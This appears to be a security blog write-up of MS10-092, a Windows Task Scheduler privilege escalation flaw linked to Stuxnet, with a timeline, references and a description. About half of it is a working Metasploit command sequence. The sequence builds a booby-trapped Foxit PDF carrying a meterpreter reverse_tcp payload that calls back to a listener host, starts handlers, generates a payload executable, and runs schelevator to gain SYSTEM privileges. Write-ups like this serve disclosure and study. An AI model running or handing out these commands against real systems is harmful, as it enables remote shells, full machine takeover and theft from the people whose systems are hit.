MS10-092 : Microsoft Windows Task Scheduler Privilege Escalation

Timeline :

webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20

    PoC provided by :

webDEViL
jduck

    Reference(s) :

CVE-2010-3338
EDB-ID-15589
MS10-092

    Affected version(s) :

Should work on Vista/Win7/2008 x86/x64

    Tested on Windows 7 Integral

    Description :

Stuxnet is not yet inhume, on four discovered 0day, only three of them where patched by Microsoft during the October second Tuesday. The last one has been reveled by webDEViL the 21 October on Exploit-DB, and one day later, this new still unpatched 0day, has been integrated into Metasploit by Rapid7 team.

This vulnerability permit to a local unprivileged user to do a “privilege escalation” attack by running the Windows scheduler on Windows Vista, Seven and 2008.

Here under a video demonstrating the privilege escalation between an another 0day disclosed by Corelan Team on Foxit PDF Reader.

    Commands :

Foxit PDF Reader exploitation

use exploit/windows/fileformat/foxit_title_b­of
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid
getprivs

Creating a test.exe containing a reverse_tcp meterpreter payload

sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe

Launching a second multi handler listener with msfcli

sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E

Running schelevator to gain system privileges

run schelevator -u test.exe

getuid
getprivs